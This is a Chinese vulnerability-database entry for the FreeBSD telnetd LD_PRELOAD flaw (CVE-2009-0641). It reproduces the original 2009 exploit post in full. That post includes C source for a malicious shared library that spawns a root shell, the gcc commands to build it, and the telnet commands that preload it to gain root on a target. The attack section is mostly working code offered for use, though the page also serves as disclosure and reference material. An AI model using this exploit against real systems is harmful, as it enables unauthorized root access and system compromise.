FreeBSD telnetd守护程序远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117405 漏洞类型 配置错误
发布时间 2009-02-16 更新时间 2009-02-21
CVE编号 CVE-2009-0641 CNNVD-ID CNNVD-200902-468
漏洞平台 FreeBSD CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-468
|漏洞详情
FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统。telnet协议允许传送telnet通讯中的环境变量并分配给tcp连接的另一端。FreeBSD的telnet守护程序在执行/bin/login之前没有检查LD_*(如LD_PRELOAD)环境变量,因此攻击者可以在传送的环境变量中包含LD_PRELOAD标识和文件系统上带有恶意代码的预编译库值。在以用户id和组id0(root)执行/bin/login时,就会通过telnet环境定义预加载远程连接所设置的库并执行。能够向目标系统放置特制文件(通过合法的登录到系统或利用系统上的其他服务)可以以运行telnet守护程序(通常为root)用户的权限执行任意代码。
|漏洞EXP
FreeBSD (7.0-RELEASE) telnet daemon local privilege escalation -
And possible remote root code excution.

There is a rather big bug in the current FreeBSD telnetd daemon.
The environment is not properly sanitized when execution /bin/login,
what leads to a (possible) remote root hole.

The telnet protocol allows to pass environment variables inside the 
telnet traffic and assign them to the other side of the tcp connection.
The telnet daemon of FreeBSD does not check for LD_* (like LD_PRELOAD)
environment variables prior to executing /bin/login.
So passing an environment variable with the identifier LD_PRELOAD and
the value of a precompiled library that is on the filesystem of the
victims box that includes malicious code is possible.
When /bin/login is executed with the user id and group id 0 ('root') it preloads
the library that was set by remote connection through a telnet environment
definition and executes it.
It is unlikely that this bug can be exploited remotely but is not impossible.
An attacker could f.e. upload a malicious library using ftp (including anonymous
 ftp users), nfs, smb or any other (file) transfer protocol. 
One scenario to exploit the bug remotely would be a ftp server running beside 
the telnet daemon serving also anoynmous users with write access. Then the
attacker would upload the malicious library and defines the LD_PRELOAD
variable to something similar to /var/ftp/mallib.so to gain remote root access.

Here comes the actual exploit which can be executed with standard UNIX tools. 
Paste this into a file using your favorite text editor:
---snip-----
# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        FILE *f;
        setenv("LD_PRELOAD", "", 1);
        system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
>auth disable SRA
>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
>open target
---snip-----
ALEX-ALEX
#ROOTSHELL

This will give us an immediate (probably remote) root shell.
This exploit is only verified on a FreeBSD 7.0-RELEASE fresh install
with telnetd enabled. Other version of FreeBSD may also be affected,
OpenBSD and NetBSD where not tested but MAY contain the same bug because
of historic reasons.

Signed,
Kingcope[nikolaos rangos]/2009

# milw0rm.com [2009-02-16]
|参考资料

来源:FREEBSD
名称:FreeBSD-SA-09:05
链接:http://security.freebsd.org/advisories/FreeBSD-SA-09:05.telnetd.asc
来源:XF
名称:freebsd-telnet-ldpreload-code-execution(48780)
链接:http://xforce.iss.net/xforce/xfdb/48780
来源:BID
名称:33777
链接:http://www.securityfocus.com/bid/33777
来源:MILW0RM
名称:8055
链接:http://www.milw0rm.com/exploits/8055
来源:FULLDISC
名称:20090214FreeBSDzeroday
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067954.html